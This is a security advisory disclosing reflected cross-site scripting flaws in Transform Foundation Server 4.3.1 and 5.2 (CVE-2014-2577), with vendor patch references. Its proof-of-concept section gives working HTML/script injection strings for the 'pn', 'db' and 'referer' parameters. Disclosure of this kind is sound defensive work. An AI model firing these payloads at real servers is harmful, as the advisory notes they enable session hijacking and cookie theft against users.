Transform Foundation Server 4.3.1 / 5.2 Cross Site Scripting

`I. VULNERABILITY  
  
-------------------------  
  
Reflected XSS Attacks vulnerabilities in Transform Foundation server 4.3.1  
and 5.2 from Bottomline Technologies  
  
  
II. BACKGROUND  
  
-------------------------  
  
Bottomline offers powerful, next-generation electronic document solutions  
for formatting,  
personalizing and delivering ERP and business application output.  
  
  
III. DESCRIPTION  
  
-------------------------  
  
Has been detected several Reflected XSS vulnerability in Transform  
Foundation server 4.3.1 and 5.2  
  
  
1. XSS on GET parameters:  
  
  
http://XXXXXXXXX/TransformContentCenter/index.fsp/document.pdf?pn="XSS CODE"  
  
http://XXXXXXXXXXXXX/"XSS CODE"server-status.cgi  
  
  
  
2. XSS on POST parameters:  
  
  
URL: XXXXXXXXX/TransformContentCenter/index.fsp/index.fsp  
  
PARAMETERS:  
  
  
db="XSS CODE"  
referer="XSS CODE"  
  
  
  
  
IV. PROOF OF CONCEPT  
  
-------------------------  
  
  
GET:  
  
The application does not validate the parameter "pn" correctly.  
  
  
http://XXXXXXXXX/TransformContentCenter/index.fsp/document.pdf?pn=</i></p><BODY  
ONLOAD=alert('Hacked-by-J.Fco-Bolivar')>  
  
http://XXXXXXXXXXXXX/<BODY  
ONLOAD=alert('Hacked-by-J.Fco-Bolivar')>server-status.cgi  
  
  
POST:  
  
The application does not validate the parameter "db" and "rerferer"  
correctly.  
  
  
XXXXXXXXX/TransformContentCenter/index.fsp/index.fsp  
  
  
db=</td></tr><BODY ONLOAD=alert('Hacked-by-J.Fco-Bolivar')>  
  
and  
  
referer=</td></tr><BODY ONLOAD=alert('Hacked-by-J.Fco-Bolivar')  
  
  
  
  
V. BUSINESS IMPACT  
  
-------------------------  
  
An attacker can execute arbitrary HTML or script code in a targeted  
user's browser, that allows the execution of arbitrary HTML/script  
code to be executed in the context of the victim user's browser  
allowing Cookie Theft/Session Hijacking, thus enabling full access the  
box.  
  
  
  
VI. SYSTEMS AFFECTED  
  
-------------------------  
  
Transform Foundation Server 4.3.1  
Transform Foundation Server 5.2  
  
  
  
VII. SOLUTION  
-------------------------  
  
  
Patches released by the vendor available on customer portal and information  
available here:  
  
  
Transform Foundation Server 4.3.1 Patch 8:  
  
http://www.pdf-archive.com/2014/06/03/tf52patch7releasenotes/preview/page/14/  
  
SF2351630  
SF2364411  
SF2391461  
  
  
Transform Foundation Server 5.2 Patch 7:  
  
  
http://www.pdf-archive.com/2014/06/03/tf52patch7releasenotes/preview/page/14/  
  
  
SF2351630  
SF2364411  
SF2391461  
  
  
  
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2577  
  
Detected and reported by J. Francisco Bolivar (es.linkedin.com/in/jfbolivar/  
)  
`